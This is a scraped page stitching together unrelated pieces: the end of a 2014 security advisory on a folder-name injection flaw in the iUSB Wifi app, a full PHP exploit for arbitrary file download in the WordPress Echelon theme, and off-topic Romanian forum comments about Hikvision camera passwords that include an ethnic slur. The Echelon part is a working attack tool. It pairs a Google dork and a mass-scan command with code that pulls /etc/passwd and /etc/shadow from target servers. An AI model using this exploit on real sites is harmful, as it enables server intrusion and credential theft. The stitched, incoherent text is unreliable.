For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue. PoC: iUSB Wifi UI - (foldername) <div class="container"> <div class="page-header"> <h1>iUSB</h1> </div> <p>Drag & drop files on this window or use the "Upload Files…" button to upload new files.</p> <div id="alerts"></div> <div class="btn-toolbar"> <button type="button" class="btn btn-primary fileinput-button"> <span class="glyphicon glyphicon-upload"></span> Upload Files… <input id="fileupload" name="files[x]" multiple="" type="file"> </button> <button type="button" class="btn btn-success" id="create-folder"> <span class="glyphicon glyphicon-folder-close"></span> Create Folder… </button> <button type="button" class="btn btn-default" id="reload"> <span class="glyphicon glyphicon-refresh"></span> Refresh </button> </div> <div class="panel panel-default uploading"> <div class="panel-heading">File Uploads in Progress</div> <table class="table table-striped"><tbody id="uploads"></tbody></table> </div> <div class="panel panel-default"> <div class="panel-heading"> <ol class="breadcrumb" id="path"></ol> </div> <table class="table table-striped"><tbody id="listing">./[CODE EXECUTION VULNERABILITY!];</tbody></table> </div> <p class="footer">iUSB 1.2</p> </div> --- PoC Session Logs [POST] --- Status: 200[OK] POST http://192.168.2.104/create Load Flags[LOAD_BYPASS_CACHE LOAD_BACKGROUND ] Größe des Inhalts[2] Mime Type[application/json] Request Header: Host[192.168.2.104] User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0] Accept[application/json, text/javascript, */*; q=0.01] Accept-Language[de,en-US;q=0.7,en;q=0.3] Accept-Encoding[gzip, deflate] Content-Type[application/x-www-form-urlencoded; charset=UTF-8] X-Requested-With[XMLHttpRequest] Referer[http://192.168.2.104/] Content-Length[81] Connection[keep-alive] Pragma[no-cache] Cache-Control[no-cache] POST-Daten: path[./[CODE EXECUTION VULNERABILITY!];+%3C] Response Header: Server[WebUploader] Cache-Control[no-cache] Content-Length[2] Content-Type[application/json] Connection[Close] Date[Tue, 09 Dec 2014 19:03:58 GMT] - Status: 200[OK] GET http://192.168.2.104/./[CODE EXECUTION VULNERABILITY!]; Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[-1] Mime Type[application/x-unknown-content-type] Request Header: Host[192.168.2.104] User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0] Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] Accept-Language[de,en-US;q=0.7,en;q=0.3] Accept-Encoding[gzip, deflate] Connection[keep-alive] Response Header: Server[WebUploader] Date[Tue, 09 Dec 2014 19:04:58 GMT] Connection[Close] Reference(s): http://localhost/create Solution - Fix & Patch: ======================= The vulnerability can be patched by a secure restriction of the create folder name input field. Restrict the input by disallow of special chars. Encode and parse the vulnerable path value that runs throught eh creat POST method request. Filter and parse also the iUSB file dir listing output with the vulnerable name value. Security Risk: ============== The security risk of the of the code execution vulnerability in the create folder function of iUSB is estimated as high. (CVSS 8.8) Credits & Authors: ================== Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com] Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/ Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission. Copyright © 2014 | Vulnerability Laboratory - [Evolution Security GmbH]™ -- VULNERABILITY LABORATORY - RESEARCH TEAM SERVICE: www.vulnerability-lab.com CONTACT: research@vulnerability-lab.com PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt Source

*Name:* Wordpress A.F.D Theme Echelon / INURL - BRASIL *Description:* This exploit allows attacker to download any writable file from the server *Usage info:* Put the path of the file in the file's field of the exploit ,then click "Download" button then you get the file directly File download /etc/passwd & /etc/shadow Failure consists of exploring a parameter $ _POST file /wp-content/themes/echelon/lib/scripts/dl-skin.php The following fields are exploited for Arbitrary File Download *POST:* _mysite_download_skin={$config['file']}&submit=Download ex: _mysite_download_skin=/etc/passwd&submit=Download *Exploit:* <?php #=============================================================================== # NAME: Wordpress A.F.D Theme Echelon # TIPE: Arbitrary File Download # Google DORK: inurl:/wp-content/themes/echelon # Vendor: www.wordpress.org # Tested on: Linux # EXECUTE: php exploit.php www.alvo.com.br # OUTPUT: EXPLOIT_WPAFD_Echelon.txt # AUTOR: Cleiton Pinheiro # Blog: http://blog.inurl.com.br # Twitter: https://twitter.com/googleinurl # Fanpage: https://fb.com/InurlBrasil # GIT: https://github.com/googleinurl # YOUTUBE https://www.youtube.com/channel/UCFP-WEzs5Ikdqw0HBLImGGA # # ------------------------------------------------------------------------------ # Comand Exec Scanner INURLBR: # ./inurlbr.php --dork 'inurl:/wp-content/themes/echelon' -q 1,6 -s save.txt --comand-all "php exploit.php _TARGET_" # ------------------------------------------------------------------------------ # Download Scanner INURLBR: # https://github.com/googleinurl/SCANNER-INURLBR #=============================================================================== error_reporting(1); set_time_limit(0); ini_set('display_errors', 1); ini_set('max_execution_time', 0); ini_set('allow_url_fopen', 1); ob_implicit_flush(true); ob_end_flush(); print empty($argv[1]) ? exit('0x[ERROR]: DEFINA URL / Execute: php exploit.php www.alvo.com.br') : NULL; $argv[1] = isset($argv[1]) && strstr($argv[1], 'http') ? $argv[1] : "http:// {$argv[1]}"; !(preg_match_all("#\b((((ht|f)tps?://*)|(www|ftp)\.)[a-zA-Z0-9-\.]+)#i", $argv[1], $alvo_)) ? exit('0x[ERROR]: DEFINA URL / Execute: php exploit.php www.alvo.com.br') : NULL; $config['line'] = "\n------------------------------------------------------------------------------------------------------------------\n"; $config['alvo'] = $alvo_[0][0]; $config['exploit'] = "/wp-content/themes/echelon/lib/scripts/dl-skin.php"; function __plus() { ob_flush(); flush(); } function __convertUrlQuery($query) { $queryParts = explode('&', $query); $params = array(); foreach ($queryParts as $param) { $item = explode('=', $param); $params[$item[0]] = urlencode($item[1]); } return $params; } function __request_info($curl, $config) { $postDados = __convertUrlQuery("_mysite_download_skin={$config['file']}&submit=Download"); foreach ($postDados as $campo => $valor) { $postDados_format .= $campo . '=' . ($valor) . '&'; } $postDados_format = rtrim($postDados_format, '&'); curl_setopt($curl, CURLOPT_POST, count($postDados)); curl_setopt($curl, CURLOPT_POSTFIELDS, $postDados_format); curl_setopt($curl, CURLOPT_URL, $config['alvo'] . $config['exploit']); curl_setopt($curl, CURLOPT_USERAGENT, 'Mozilla/' . rand(1, 20) . '.0 (X11; Linux x8' . rand(1, 20) . '_6' . rand(1, 20) . ') blog.inurl.com.br/' . md5(rand(1, 200)) . '.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/' . rand(1, 500) . '.31'); curl_setopt($curl, CURLOPT_REFERER, $config['alvo'] . $config['exploit']); curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($curl, CURLOPT_CONNECTTIMEOUT, 20); curl_setopt($curl, CURLOPT_HEADER, 1); curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1); $corpo = curl_exec($curl); $server = curl_getinfo($curl); $status = NULL; preg_match_all('(HTTP.*)', $corpo, $status['http']); preg_match_all('(Server:.*)', $corpo, $status['server']); preg_match_all('(Content-Disposition:.*)', $corpo, $status['Content-Disposition']); $info = str_replace("\r", '', str_replace("\n", '', "{$status['http'][0][0]}, {$status['server'][0][0]} {$status['Content-Disposition'][0][0]}")); curl_close($curl); unset($curl); return isset($corpo) ? array('corpo' => $corpo, 'server' => $server, 'info' => $info) : FALSE; } function main($config,$rest) { __plus(); print "0x " . date("h:m:s") . " [INFO][EXPLOITATION THE FILE]: {$config['file']}:\n"; preg_match_all("(root:.*)", $rest['corpo'], $final); preg_match_all("(sbin:.*)", $rest['corpo'], $final__); preg_match_all("(ftp:.*)", $rest['corpo'], $final___); preg_match_all("(nobody:.*)", $rest['corpo'], $final____); preg_match_all("(mail:.*)", $rest['corpo'], $final_____); $_final = array_merge($final[0], $final__[0], $final___[0], $final____[0], $final_____[0]); $res = NULL; if (preg_match("#root#i", $rest['corpo'])) { $res.= "0x " . date("h:m:s") . " [INFO][IS VULN][RESUME][VALUES]:\n"; $res.=$config['line'] . "\n"; foreach ($_final as $value) { $res.="0x " . date("h:m:s") . " [VALUE]: $value\n"; } $res.=$config['line']; __plus(); file_put_contents('EXPLOIT_WPAFD_Echelon.txt', "{$config['alvo']}\n{$res}\n", FILE_APPEND); print "{$res}[VALUES SAVED]: EXPLOIT_WPAFD_Echelon.txt\n\n"; } else { print "0x " . date("h:m:s") . " [INFO][NOT VULN]\n"; } } print "\r\n0x[EXPLOIT NAME]: Wordpress A.F.D Theme Echelon / INURL - BRASIL\n"; $config['file'] = '/etc/passwd'; $rest = __request_info($objcurl = curl_init(), $config); __plus(); print $line; print "0x " . date("h:m:s") . " [INFO]: {$rest['info']}\n"; print "0x " . date("h:m:s") . " [INFO][TARGET]: {$config['alvo']}\n"; main($config,$rest); __plus(); $config['file'] = '/etc/shadow'; $rest = __request_info($objcurl = curl_init(), $config); __plus(); main($config,$rest); __plus(); Source

@toofast iti dai seama ca e testat...

@Terry.Crews ai inteles gresit toata chestia asta. Acest video este facut pentru a arata sa zic asa ,, partile distractive" ale meseriei lor. Ceva de genul "NASA in alt mod,,

@quadxenon deja imi e rusine ca ma cobor la nivelul unuia ca tine... nu mai face offtopic aiurea, in primul rand ai buton de edit. cat despre faza cu tiganca, omul e 2 pe 2 ce putea aia sa faca. plus ca stau la 1 strada distanta in 5 minute am ajuns. Daca e chiar neaparata nevoie am sa ma duc la acel amic sa filmez aparatul sa te potolesti din comentat. Sa il arda cineva pe asta, locul lui nu e pe rst...

@quadxenon cu greu ma controlez, nu abuza de bunul simt pe care il am, te rog. Omul imi e tovaras si m-a sunat. acum sa iti explic cum sta treaba Cand au instalat baietii sistemul le-a cerut username & password si ei au uitat sa ii lase datele pe acest sistem Hikivision cand vrei sa umbli la ceva ( inregistrari, setari, etc... iti cere datele inca o data si inca o data ca sa intelegi) El vedea doar in timp real, dar daca vroia sa dea inapoi ii cerea datele. si cum suntem tovarasi mi-a dat un telefon si l-am ajutat.

@quadxenon nu ia spart nimeni magazinul, pur si simplu o "colorata" i-a furat din vitrina ceva, el a vazut dar aia nu a vrut sa recunoasca si a vrut sa se uite pe camera, ca sa uite avea nevoie sa acceseze arhiva ca sa acceseze arhiva ii cerea username & password. daca nu stii nu vorbi aiurea ( daca e nevoie revin cu video) A da sistemul era Hikvision.